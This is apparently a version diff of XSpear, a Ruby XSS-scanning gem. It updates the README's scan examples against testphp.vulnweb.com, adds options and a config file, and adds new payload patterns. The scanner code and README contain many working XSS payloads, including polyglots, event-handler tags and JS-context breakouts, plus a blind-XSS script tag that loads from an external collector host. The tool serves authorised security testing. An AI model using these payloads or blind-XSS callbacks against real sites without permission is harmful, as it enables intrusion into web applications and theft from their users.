+ [*] test query generation is complete. [249 query]
159
+ [*] starting XSS Scanning. [10 threads]
160
+ ...
161
+ [ Request ]
162
+ {"accept-encoding"=>["gzip;q=1.0,deflate;q=0.6,identity;q=0.3"], "accept"=>["*/*"], "user-agent"=>["Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0"], "connection"=>["keep-alive"], "host"=>["testphp.vulnweb.com"]}
163
+ [ Response ]
164
+ {"server"=>["nginx/1.4.1"], "date"=>["Sun, 29 Dec 2019 13:54:36 GMT"], "content-type"=>["text/html"], "transfer-encoding"=>["chunked"], "connection"=>["keep-alive"], "x-powered-by"=>["PHP/5.3.10-1~lucid+2uwsgi2"]}
165
+ [H] [22:57:33] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
166
+ ...
167
+ you see report
168
+ ```
94
169
  ### Case by Case
95
170
  **Scanning XSS**
96
171
  ```
97
172
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
98
173
  ```
99
174
 
100
- **json output(with silence mode)**
175
+ **Only JSON output**
101
176
  ```
102
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
177
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
103
178
  ```
104
179
 
105
- **detail log**
106
- ```
107
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
108
- ```
109
180
 
110
- **set thread**
181
+ **Set scanning thread**
111
182
  ```
112
183
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
113
184
  ```
114
185
 
115
- **testing at selected parameters**
186
+ **Testing at selected parameters**
116
187
  ```
117
188
  $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
118
189
  ```
119
190
 
120
- **testing blind xss**<br>
191
+ **Testing at all parameters**<br>
192
+ (This option is tested with or without reflection.)
193
+ ```
194
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
195
+ ```
196
+
197
+ **Testing blind xss(all params)**<br>
121
198
  (Should be used as much as possible because Blind XSS is everywhere)<br>
122
199
  ```
123
- $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
200
+ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht" -a
124
201
 
125
202
  # Set your blind xss host. <-b options>
126
203
  ```
127
204
 
205
+ **for Pipeline**<br>
206
+ ```
207
+ $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json
208
+
209
+ # -u : target
210
+ # -b : testing blind xss
211
+ # -a : test all params(test to not reflected param)
212
+ # -v : verbose, not showing logs at value 1.
213
+ # -o : output optios, json!
214
+ ```
215
+ result json data
216
+ ```
217
+ {
218
+ "starttime": "2019-12-25 00:02:58 +0900",
219
+ "endtime": "2019-12-25 00:03:31 +0900",
220
+ "issue_count": 25,
221
+ "issue_list": [{
222
+ "id": 0,
223
+ "type": "INFO",
224
+ "issue": "DYNAMIC ANALYSIS",
225
+ "method": "GET",
226
+ "param": "cat",
227
+ "payload": "XsPeaR\"",
228
+ "description": "Found SQL Error Pattern"
229
+ }, {
230
+ "id": 1,
231
+ "type": "INFO",
232
+ "issue": "STATIC ANALYSIS",
233
+ "method": "GET",
234
+ "param": "-",
235
+ "payload": "<original query>",
236
+ "description": "Found Server: nginx/1.4.1"
237
+ }, {
238
+ "id": 2,
239
+ "type": "INFO",
240
+ "issue": "STATIC ANALYSIS",
241
+ "method": "GET",
242
+ "param": "-",
243
+ "payload": "<original query>",
244
+ "description": "Not set HSTS"
245
+ }, {
246
+ "id": 3,
247
+ "type": "INFO",
248
+ "issue": "STATIC ANALYSIS",
249
+ "method": "GET",
250
+ "param": "-",
251
+ "payload": "<original query>",
252
+ "description": "Content-Type: text/html"
253
+ }, {
254
+ "id": 4,
255
+ "type": "LOW",
256
+ "issue": "STATIC ANALYSIS",
257
+ "method": "GET",
258
+ "param": "-",
259
+ "payload": "<original query>",
260
+ "description": "Not Set X-Frame-Options"
261
+ }, {
262
+ "id": 5,
263
+ "type": "MIDUM",
264
+ "issue": "STATIC ANALYSIS",
265
+ "method": "GET",
266
+ "param": "-",
267
+ "payload": "<original query>",
268
+ "description": "Not Set CSP"
269
+ }, {
270
+ "id": 6,
271
+ "type": "INFO",
272
+ "issue": "REFLECTED",
273
+ "method": "GET",
274
+ "param": "cat",
275
+ "payload": "rEfe6",
276
+ "description": "reflected parameter"
277
+ }, {
278
+ "id": 7,
279
+ "type": "INFO",
280
+ "issue": "FILERD RULE",
281
+ "method": "GET",
282
+ "param": "cat",
283
+ "payload": "onhwul=64",
284
+ "description": "not filtered event handler on{any} pattern"
285
+ }
286
+ ....
287
+ , {
288
+ "id": 17,
289
+ "type": "HIGH",
290
+ "issue": "XSS",
291
+ "method": "GET",
292
+ "param": "cat",
293
+ "payload": "<audio src onloadstart=alert(45)>",
294
+ "description": "reflected HTML5 XSS Code"
295
+ }, {
296
+ "id": 18,
297
+ "type": "HIGH",
298
+ "issue": "XSS",
299
+ "method": "GET",
300
+ "param": "cat",
301
+ "payload": "<keygen autofocus onfocus=alert(45)>",
302
+ "description": "reflected onfocus XSS Code"
303
+ ....
304
+ }, {
305
+ "id": 24,
306
+ "type": "HIGH",
307
+ "issue": "XSS",
308
+ "method": "GET",
309
+ "param": "cat",
310
+ "payload": "<marquee onstart=alert(45)>",
311
+ "description": "triggered <marquee onstart=alert(45)>"
312
+ }]
313
+ }
314
+ ```
315
+ (Items marked as `triggered` are actually payloads that work in the browser.)
316
+
128
317
  etc...
129
318
 
130
319
  ### Sample log
@@ -143,32 +332,7 @@ __((_)(_)) /(/( /((_))(_))(()\
143
332
  {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================-
144
333
  / \<
145
334
  \> [ v1.1.5 ]
146
- [*] analysis request..
147
- [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected rEfe6
148
- [-] [23:50:35] [200/OK] 'cat' not reflected <script>alert(45)</script>
149
- [I] [23:50:35] [200/OK] [param: cat][Found SQL Error Pattern]
150
- [-] [23:50:35] [200/OK] 'zfdfasdf' not reflected <script>alert(45)</script>
151
- [-] [23:50:35] [200/OK] 'STATIC' not reflected
152
- [I] [23:50:35] [200/OK] reflected rEfe6[param: cat][reflected parameter]
153
- [*] creating a test query [for reflected 2 param + blind xss ]
154
- [*] test query generation is complete. [192 query]
155
- [*] starting XSS Scanning. [10 threads]
156
- ..snip..
157
- [I] [23:50:47] [200/OK] reflected xsp<frameset>
158
- [I] [23:50:47] [200/OK] reflected xsp<applet>
159
- [I] [23:50:48] [200/OK] reflected document.cookie.xspear
160
- [I] [23:50:48] [200/OK] reflected document.location.xspear
161
- [-] [23:50:48] [200/OK] 'cat' not reflected <svg/onload=alert(45)>
162
- [H] [23:50:50] [200/OK] reflected <keygen autofocus onfocus=alert(45)>[param: cat][reflected onfocus XSS Code]
163
- [-] [23:50:55] [200/OK] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>">
164
- [V] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script>[param: cat][triggered <script>alert(45)</script>]
165
- [H] [23:50:56] [200/OK] found alert/prompt/confirm (45) in selenium!! <marquee onstart=alert(45)>[param: cat][triggered <marquee onstart=alert(45)>]
166
- [H] [23:50:57] [200/OK] found alert/prompt/confirm (45) in selenium!! <details/open/ontoggle="alert(45)">[param: cat][triggered <details/open/ontoggle="alert(45)">]
167
- [H] [23:50:58] [200/OK] found alert/prompt/confirm (45) in selenium!! <audio src onloadstart=alert(45)>[param: cat][triggered <audio src onloadstart=alert(45)>]
168
- [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)>
169
- [-] [23:50:59] [200/OK] 'cat' not found alert/prompt/confirm event <svg(0x0c)onload=alert(1)>
170
- [V] [23:51:00] [200/OK] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)>[param: cat][triggered <svg/onload=alert(45)>]
171
- ...snip..
335
+ ...snip...
172
336
  [*] finish scan. the report is being generated..
173
337
  +----+-------+------------------+--------+-------+----------------------------------------+-----------------------------------------------+
174
338
  | [ XSpear report ] |
@@ -343,3 +507,6 @@ Everyone interacting in the XSpear project’s codebases, issue trackers, chat r
343
507
  <img src="https://user-images.githubusercontent.com/13212227/63032409-b8996580-bef0-11e9-93cd-dbabbd5f4ea1.png" width=100%>
344
508
  < JSON Report >
345
509
  <img src="https://user-images.githubusercontent.com/13212227/63032411-b8996580-bef0-11e9-8aee-0b80fe87f50d.png" width=100%>
510
+
511
+ ## Video
512
+ [![asciicast](https://asciinema.org/a/290126.svg)](https://asciinema.org/a/290126)
data/XSpear.gemspec CHANGED
@@ -37,10 +37,12 @@ Gem::Specification.new do |spec|
37
37
  spec.add_runtime_dependency "colorize", "~> 0.8.1"
38
38
  spec.add_runtime_dependency "selenium-webdriver", "~> 3.142.3"
39
39
  spec.add_runtime_dependency "terminal-table", "~> 1.8.0"
40
+ spec.add_runtime_dependency "progress_bar", "~> 2.3.2"
40
41
 
41
42
  spec.add_development_dependency "colorize", "~> 0.8.1"
42
43
  spec.add_development_dependency "selenium-webdriver", "~> 3.142.3"
43
44
  spec.add_development_dependency "terminal-table" , "~> 1.8.0"
45
+ spec.add_development_dependency "progress_bar", "~> 2.3.2"
44
46
  spec.add_development_dependency "bundler", "~> 2.0"
45
47
  spec.add_development_dependency "rake", "~> 10.0"
46
48
  spec.add_development_dependency "rspec", "~> 3.0"
data/config.json ADDED
@@ -0,0 +1,9 @@
1
+ {
2
+ "blind":"",
3
+ "headers":"",
4
+ "cookie":"",
5
+ "thread":"",
6
+ "output":"",
7
+ "verbose":"",
8
+ "all":false
9
+ }
data/exe/XSpear CHANGED
@@ -1,11 +1,11 @@
1
1
  #!/usr/bin/env ruby
2
+ require "XSpear"
2
3
 
4
+ XOptions = Struct.new(:url, :data, :headers, :params, :options)
3
5
 
4
- require "XSpear"
5
- Options = Struct.new(:url, :data, :headers, :params, :options )
6
6
  class Parser
7
7
  def self.parse(options)
8
- args = Options.new('xspear')
8
+ args = XOptions.new('xspear')
9
9
  args.options = {}
10
10
  if options.empty?
11
11
  banner
@@ -13,7 +13,7 @@ class Parser
13
13
  exit
14
14
  end
15
15
  opt_parser = OptionParser.new do |opts|
16
- opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin'\n\n[ Options ]"
16
+ opts.banner = "Usage: xspear -u [target] -[options] [value]\n[ e.g ]\n$ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a \n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2\n$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json\n\n[ Options ]"
17
17
 
18
18
 
19
19
  opts.on('-u', '--url=target_URL', '[required] Target Url') do |n|
@@ -48,7 +48,6 @@ class Parser
48
48
  args.options['params'] = n
49
49
  end
50
50
 
51
-
52
51
  opts.on('-b', '--BLIND=URL', '[optional] Add vector of Blind XSS',' + with XSS Hunter, ezXSS, HBXSS, etc...',' + e.g : -b https://hahwul.xss.ht') do |n|
53
52
  args.options['blind'] = n
54
53
  end
@@ -59,15 +58,18 @@ class Parser
59
58
  end
60
59
 
61
60
 
62
- opts.on('-o', '--output=FILENAME', '[optional] Save JSON Result') do |n|
61
+ opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
63
62
  args.options['output'] = n
64
63
  end
65
64
 
65
+ opts.on('-c', '--config=FILENAME', '[optional] Using config.json') do |n|
66
+ args.options['config'] = n
67
+ end
66
68
 
67
- opts.on('-v', '--verbose=1~3', '[optional] Show log depth',
68
- ' + Default value: 2',
69
- ' + v=1 : quite mode',
70
- ' + v=2 : show scanning log',
69
+ opts.on('-v', '--verbose=0~3', '[optional] Show log depth',
70
+ ' + v=0 : quite mode(only result)',
71
+ ' + v=1 : show scanning status(default)',
72
+ ' + v=2 : show scanning logs',
71
73
  ' + v=3 : show detail log(req/res)') do |n|
72
74
  args.options['verbose'] = n
73
75
  end
@@ -151,10 +153,21 @@ end
151
153
 
152
154
  exit unless options.url
153
155
  options.options['thread'] = 10 unless options.options['thread']
154
- options.options['verbose'] = 2 unless options.options['verbose']
156
+ options.options['verbose'] = 1 unless options.options['verbose']
155
157
  options.options['thread'] = options.options['thread'].to_i
156
158
 
157
- if options.options['verbose'].to_i != 1
159
+ if !options.options['config'].nil?
160
+ f = File.open(options.options['config'])
161
+ buf = f.read
162
+ cjson = JSON.parse buf
163
+ cjson.each do |key,value|
164
+ if value.to_s.size > 0
165
+ options.options[key] = value
166
+ end
167
+ end
168
+ end
169
+
170
+ if options.options['verbose'].to_i != 0
158
171
  banner
159
172
  end
160
173
  s = XspearScan.new options.url, options.options
data/lib/XSpear/log.rb CHANGED
@@ -10,7 +10,16 @@ def log(t, message)
10
10
 
11
11
  # system message
12
12
  # [+] start parameter analysis..
13
- if @verbose.to_i > 1
13
+ # verbose 0 : only result
14
+ # verbose 1(default) : show progress
15
+ # verbose 2 : show normal log(info, payload)
16
+ # verbose 3 : show details log(info, payload, packets, etc..)
17
+
18
+ if @verbose.to_i == 1
19
+ if t == 's' # system message
20
+ puts '[*]'.green + " #{message}"
21
+ end
22
+ elsif @verbose.to_i > 1
14
23
  time = Time.now
15
24
  if t == 'd'
16
25
  puts '[-]'.white + " [#{time.strftime('%H:%M:%S')}] #{message}"
data/lib/XSpear/version.rb CHANGED
@@ -1,3 +1,3 @@
1
1
  module XSpear
2
- VERSION = "1.2.3"
2
+ VERSION = "1.3.0"
3
3
  end
data/lib/XSpear.rb CHANGED
@@ -7,6 +7,7 @@ require 'uri'
7
7
  require 'optparse'
8
8
  require 'colorize'
9
9
  require "selenium-webdriver"
10
+ require "progress_bar"
10
11
 
11
12
  module XSpear
12
13
  class Error < StandardError; end
@@ -35,6 +36,7 @@ class XspearScan
35
36
  @filtered_objects = {}
36
37
  @reflected_params = []
37
38
  @param_check_switch = 0
39
+ @progress_bar = nil
38
40
  end
39
41
 
40
42
  class ScanCallbackFunc
@@ -172,7 +174,7 @@ class XspearScan
172
174
  d = c.split " "
173
175
  r = r+d[0]+" "
174
176
  end
175
- @report.add_issue("i","s","-","-","<original query>","Set CSP(#{r})")
177
+ @report.add_issue("i","s","-","-","<original query>","Enabled CSP")
176
178
  rescue
177
179
  @report.add_issue("i","s","-","-","<original query>","CSP ERROR")
178
180
  end
@@ -180,7 +182,6 @@ class XspearScan
180
182
  @report.add_issue("m","s","-","-","<original query>","Not Set CSP")
181
183
  end
182
184
 
183
-
184
185
  [false, "not reflected #{@query}"]
185
186
  end
186
187
  end
@@ -500,9 +501,9 @@ class XspearScan
500
501
 
501
502
 
502
503
  # Check Event Handler
503
- r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "not filtered event handler "+"on{any} pattern".blue, CallbackStringMatch)
504
+ r.push makeQueryPattern('f', '\"><xspear onhwul=64>', 'onhwul=64', 'i', "reflected EH "+"on{any} pattern".blue, CallbackStringMatch)
504
505
  event_handler.each do |ev|
505
- r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "not filtered event handler "+"#{ev}=64".blue, CallbackNotAdded)
506
+ r.push makeQueryPattern('f', "\"<xspear #{ev}=64>", "#{ev}=64", 'i', "reflected EH "+"#{ev}=64".blue, CallbackNotAdded)
506
507
  end
507
508
 
508
509
 
@@ -541,18 +542,21 @@ class XspearScan
541
542
  r.push makeQueryPattern('x', "\"'><#{t} autofocus onfocus=alert(45)>", "<#{t} autofocus onfocus=alert(45)>", 'h', "reflected "+"onfocus XSS Code".red, CallbackStringMatch)
542
543
  end
543
544
 
544
-
545
545
  # Check Selenium Common XSS Payloads
546
546
  r.push makeQueryPattern('x', '"><script>alert(45)</script>', '<script>alert(45)</script>', 'v', "triggered ".yellow+"<script>alert(45)</script>".red, CallbackXSSSelenium)
547
547
  r.push makeQueryPattern('x', '"><svgonload=alert(45)>', '<svg(0x0c)onload=alert(1)>', 'v', "triggered ".yellow+"<svg(0x0c)onload=alert(1)>".red, CallbackXSSSelenium)
548
548
  r.push makeQueryPattern('x', '<xmp><p title="</xmp><svg/onload=alert(45)>">', '<xmp><p title="</xmp><svg/onload=alert(45)>">', 'v', "triggered ".yellow+"<xmp><p title='</xmp><svg/onload=alert(45)>'>".red, CallbackXSSSelenium)
549
549
  r.push makeQueryPattern('x', '\'"><svg/onload=alert(45)>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"<svg/onload=alert(45)>".red, CallbackXSSSelenium)
550
- r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'h', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
551
- r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'h', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
552
- r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'h', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
553
- r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'h', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
554
- r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'h', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
555
-
550
+ r.push makeQueryPattern('x', '"\'><video/poster/onerror=alert(45)>', '<video/poster/onerror=alert(45)>', 'v', "triggered ".yellow+"<video/poster/onerror=alert(45)>".red, CallbackXSSSelenium)
551
+ r.push makeQueryPattern('x', '"\'><details/open/ontoggle="alert(45)">', '<details/open/ontoggle="alert(45)">', 'v', "triggered ".yellow+"<details/open/ontoggle=\"alert(45)\">".red, CallbackXSSSelenium)
552
+ r.push makeQueryPattern('x', '"\'><audio src onloadstart=alert(45)>', '<audio src onloadstart=alert(45)>', 'v', "triggered ".yellow+"<audio src onloadstart=alert(45)>".red, CallbackXSSSelenium)
553
+ r.push makeQueryPattern('x', '"\'><marquee onstart=alert(45)>', '<marquee onstart=alert(45)>', 'v', "triggered ".yellow+"<marquee onstart=alert(45)>".red, CallbackXSSSelenium)
554
+ r.push makeQueryPattern('x', '"\'><svg/whatthe=""onload=alert(45)>', '<svg/whatthe=""onload=alert(45)>', 'v', "triggered ".yellow+"<svg/whatthe=""onload=alert(45)>".red, CallbackXSSSelenium)
555
+ # + in Javascript payloads
556
+ r.push makeQueryPattern('x', '\'+alert(45)+\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
557
+ r.push makeQueryPattern('x', '"+alert(45)+"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
558
+ r.push makeQueryPattern('x', '\'%2Balert(45)%2B\'', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
559
+ r.push makeQueryPattern('x', '"%2Balert(45)%2B"', 'alert(45)', 'v', "triggered ".yellow+"in JS".red, CallbackXSSSelenium)
556
560
 
557
561
  # Check Selenium XSS Polyglot
558
562
  r.push makeQueryPattern('x', 'jaVasCript:/*-/*`/*\`/*\'/*"/**/(/* */oNcliCk=alert(45) )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert(45)//>\x3e', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
@@ -560,8 +564,6 @@ class XspearScan
560
564
  r.push makeQueryPattern('x', 'javascript:"/*\'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert(45)//>', '\'"><svg/onload=alert(45)>', 'v', "triggered ".yellow+"XSS Polyglot payload".red, CallbackXSSSelenium)
561
565
 
562
566
 
563
-
564
-
565
567
  # Check Blind XSS Payload
566
568
  if !@blind_url.nil?
567
569
  r.push makeQueryPattern('f', "\"'><script src=#{@blind_url}></script>", "BLINDNOTDETECTED", 'i', "", CallbackNotAdded)
@@ -575,8 +577,9 @@ class XspearScan
575
577
  r = r.flatten
576
578
  log('s', "test query generation is complete. [#{r.length} query]")
577
579
  log('s', "starting XSS Scanning. [#{@thread} threads]")
578
-
579
-
580
+ if @verbose.to_i == 1
581
+ @progress_bar = ProgressBar.new(r.length)
582
+ end
580
583
  threads = []
581
584
  r.each_slice(@thread) do |jobs|
582
585
  jobs.map do |node|
@@ -622,7 +625,6 @@ class XspearScan
622
625
  # [x]ss
623
626
  # [s]tatic
624
627
  # [d]ynamic
625
-
626
628
  result = []
627
629
  if type == 's'
628
630
  if @data.nil?
@@ -664,10 +666,36 @@ class XspearScan
664
666
  end
665
667
  end
666
668
  end
669
+ if callback == CallbackXSSSelenium
670
+ begin
671
+ puri = URI.parse(@url)
672
+ puri.path = puri.path+URI.encode("/"+pattern)
673
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
674
+ puri = URI.parse(@url)
675
+ puri.path = puri.path+URI.encode(pattern)
676
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
677
+ rescue
678
+ # bypass
679
+ # if no slash end
680
+ end
681
+ end
667
682
  rescue StandardError
668
683
  # bypass
669
- # puts @data
670
- # puts e
684
+ # if no params
685
+
686
+ if callback == CallbackXSSSelenium
687
+ begin
688
+ puri = URI.parse(@url)
689
+ puri.path = puri.path+URI.encode("/"+pattern)
690
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
691
+ puri = URI.parse(@url)
692
+ puri.path = puri.path+URI.encode(pattern)
693
+ result.push("inject": 'url',"param":"STATIC" ,"type": type, "query": puri.to_s, "pattern": "[PATH]", "desc": "[Path]"+desc, "category": category, "callback": callback)
694
+ rescue
695
+ # bypass
696
+ # if no slash end
697
+ end
698
+ end
671
699
  end
672
700
  result
673
701
  end
@@ -675,7 +703,17 @@ class XspearScan
675
703
 
676
704
  def task(query, injected, pattern, callback)
677
705
  begin
678
- uri = URI.parse(@url)
706
+ if (!@progress_bar.nil?) && @verbose.to_i == 1
707
+ print "\r\r"
708
+ print "\r\r"
709
+ @progress_bar.increment!
710
+ end
711
+ uri = nil
712
+ if pattern == "[PATH]"
713
+ uri = URI.parse(query)
714
+ else
715
+ uri = URI.parse(@url)
716
+ end
679
717
  request = nil
680
718
  method = "GET"
681
719
  uri.query = query if injected == 'url'
@@ -716,6 +754,6 @@ class XspearScan
716
754
  end
717
755
  end
718
756
  rescue => e
719
- puts e
757
+ #puts e
720
758
  end
721
759
  end
metadata CHANGED
@@ -1,14 +1,14 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: XSpear
3
3
  version: !ruby/object:Gem::Version
4
- version: 1.2.3
4
+ version: 1.3.0
5
5
  platform: ruby
6
6
  authors:
7
7
  - hahwul
8
8
  autorequire:
9
9
  bindir: exe
10
10
  cert_chain: []
11
- date: 2019-12-23 00:00:00.000000000 Z
11
+ date: 2019-12-29 00:00:00.000000000 Z
12
12
  dependencies:
13
13
  - !ruby/object:Gem::Dependency
14
14
  name: colorize
@@ -52,6 +52,20 @@ dependencies:
52
52
  - - "~>"
53
53
  - !ruby/object:Gem::Version
54
54
  version: 1.8.0
55
+ - !ruby/object:Gem::Dependency
56
+ name: progress_bar
57
+ requirement: !ruby/object:Gem::Requirement
58
+ requirements:
59
+ - - "~>"
60
+ - !ruby/object:Gem::Version
61
+ version: 2.3.2
62
+ type: :runtime
63
+ prerelease: false
64
+ version_requirements: !ruby/object:Gem::Requirement
65
+ requirements:
66
+ - - "~>"
67
+ - !ruby/object:Gem::Version
68
+ version: 2.3.2
55
69
  - !ruby/object:Gem::Dependency
56
70
  name: colorize
57
71
  requirement: !ruby/object:Gem::Requirement
@@ -94,6 +108,20 @@ dependencies:
94
108
  - - "~>"
95
109
  - !ruby/object:Gem::Version
96
110
  version: 1.8.0
111
+ - !ruby/object:Gem::Dependency
112
+ name: progress_bar
113
+ requirement: !ruby/object:Gem::Requirement
114
+ requirements:
115
+ - - "~>"
116
+ - !ruby/object:Gem::Version
117
+ version: 2.3.2
118
+ type: :development
119
+ prerelease: false
120
+ version_requirements: !ruby/object:Gem::Requirement
121
+ requirements:
122
+ - - "~>"
123
+ - !ruby/object:Gem::Version
124
+ version: 2.3.2
97
125
  - !ruby/object:Gem::Dependency
98
126
  name: bundler
99
127
  requirement: !ruby/object:Gem::Requirement
@@ -161,6 +189,7 @@ files:
161
189
  - XSpear.gemspec
162
190
  - bin/console
163
191
  - bin/setup
192
+ - config.json
164
193
  - exe/XSpear
165
194
  - lib/XSpear.rb
166
195
  - lib/XSpear/XSpearRepoter.rb